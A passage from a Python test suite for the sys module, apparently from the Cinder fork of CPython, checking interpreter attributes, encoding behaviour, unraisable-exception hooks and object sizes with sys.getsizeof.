# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
finally:
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization", "isolated",
"dev_mode", "utf8_mode")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
def test_cinder_implementation(self):
self.assertTrue(hasattr(sys.implementation, '_is_cinder'))
self.assertEqual(sys.implementation._is_cinder, True)
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
@test.support.requires_type_collecting
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
@test.support.requires_type_collecting
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P3P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('3P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('5P2c4P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('13P1q'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('3Pb2PPP4PP'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPPP'
if hasattr(sys, 'getcounts'):
fmt += '3n2P'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'3P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'4P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn3P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn3P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_method_free_list(self):
# test default initial size
self.assertEqual(256, sys._get_method_free_list_size())
